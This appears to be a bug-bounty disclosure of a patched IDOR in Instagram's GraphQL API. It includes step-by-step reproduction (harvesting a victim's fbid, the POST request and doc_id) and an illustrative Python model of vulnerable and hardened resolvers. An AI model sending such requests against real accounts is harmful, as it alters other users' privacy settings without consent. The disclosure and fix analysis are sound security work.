Marcos Ferreira

Published On: 22 Mar 2022

Change Ad Targeting setting of any Instagram user.

Category: IDOR
Platform: Instagram | Android
Severity: Low (Valid)
Description

In the Instagram Android or iOS app, users have a control option to indicate whether they want Instagram to use data about their activity from partners to personalize their ads on Instagram. This setting covers information about activity on third-party sites and apps: https://www.facebook.com/help/instagram/2885653514995517

Impact

Due to an incorrect GraphQL configuration, the mutation that updates this setting accepted a client-supplied user ID without checking that it belonged to the authenticated user, so any user could modify a specific other user's ad settings.
Reproduction Steps

Step 1

You will first need the InstagramV2 ID of the target user:
- Go to the Instagram profile
- Right-click the page and click on "View Page Source," or press Ctrl + U to see the page's source
- Search for "fbid"

Step 2

Send a POST request to graph.facebook.com/graphql and change the value of the "igfbidv2" parameter to the fbid obtained in step 1:

variables={"igfbidv2":"0","isUndo":true}
doc_id=4155574647857786

Step 3

Response:

"data":{
  "tc_opt_out_from_third_party_for_igfbidv2": {
    "is_opted_out_from_third_party_for_igfbidv2": false,
    "id": "000"
  }
}
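The root cause above is a classic IDOR: the server trusts the object ID sent by the client instead of deriving it from the session. The following is an added illustration, not Instagram's or Meta's code, that models the opt-out mutation in a vulnerable form beside a hardened form. The function names, the in-memory store and the sample user IDs are all constructed for the example; the variable names igfbidv2 and isUndo and the response field names follow the report.

```python
# Added example (not Instagram's/Meta's code): a minimal model of the
# "opt out of third-party ad data" mutation from the report. The vulnerable
# resolver writes to whatever igfbidv2 the client sent; the hardened one binds
# the target to the authenticated session. Store, session and IDs are constructed.
from dataclasses import dataclass, field


@dataclass
class Session:
    """Authenticated caller; user_id comes from the server-side session, not the request."""
    user_id: str


@dataclass
class AdSettingsStore:
    """Constructed stand-in for the per-user ad settings table."""
    opted_out: dict = field(default_factory=dict)

    def get(self, user_id):
        return self.opted_out.get(user_id, False)


class AuthorizationError(Exception):
    """Raised when a caller tries to modify another user's settings."""


def vulnerable_set_opt_out(store, session, variables):
    """Mirrors the flaw in the report: the mutation updates the igfbidv2 the
    client supplied and never compares it with the session's own user."""
    target = variables["igfbidv2"]
    # isUndo=true reverts an opt-out, so the stored flag becomes False
    store.opted_out[target] = not variables["isUndo"]
    return {
        "is_opted_out_from_third_party_for_igfbidv2": store.opted_out[target],
        "id": target,
    }


def hardened_set_opt_out(store, session, variables):
    """Fix: the object being written is the session user. A client-supplied id
    that does not match is rejected (and is worth logging as an IDOR attempt)
    rather than silently honoured."""
    requested = variables.get("igfbidv2")
    if requested is not None and requested != session.user_id:
        raise AuthorizationError(
            f"session user {session.user_id} may not modify settings of {requested}"
        )
    target = session.user_id
    store.opted_out[target] = not variables["isUndo"]
    return {
        "is_opted_out_from_third_party_for_igfbidv2": store.opted_out[target],
        "id": target,
    }


def demo():
    """Constructed scenario: 'victim' has opted out; 'attacker' sends isUndo for
    victim's id. Returns (victim flag after vulnerable call, whether the hardened
    call was blocked, victim flag after the hardened call)."""
    store = AdSettingsStore()
    store.opted_out["victim"] = True
    attacker = Session(user_id="attacker")
    cross_user_request = {"igfbidv2": "victim", "isUndo": True}

    vulnerable_set_opt_out(store, attacker, cross_user_request)
    after_vulnerable = store.get("victim")  # attacker flipped the victim's setting

    store.opted_out["victim"] = True  # reset for the hardened run
    try:
        hardened_set_opt_out(store, attacker, cross_user_request)
        blocked = False
    except AuthorizationError:
        blocked = True
    return after_vulnerable, blocked, store.get("victim")


if __name__ == "__main__":
    print(demo())
```

The hardened resolver still accepts a request whose igfbidv2 equals the session user, so legitimate clients keep working; the only behavioural change is that a mismatching ID is refused, which is also the condition a detection rule would alert on.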

Bypass

After the patch confirmation, I found a bypass, but it was closed as a duplicate internally.

Timeline

Marcos, 07 Aug 2021

Initial Report

Facebook, 09 Aug 2021

Triaged: Thank you for reporting this information to us. We are sending it to the appropriate product team for further investigation. We will keep you upd ...

Facebook, 10 Aug 2021

Bug Fixed: We have looked into this issue and believe that the vulnerability has been patched. Please let us know if you believe that the patch does not res ...

Facebook, 25 Aug 2021

Bounty awarded: You demonstrated an issue that could have allowed modifying a specific other user's ad settings.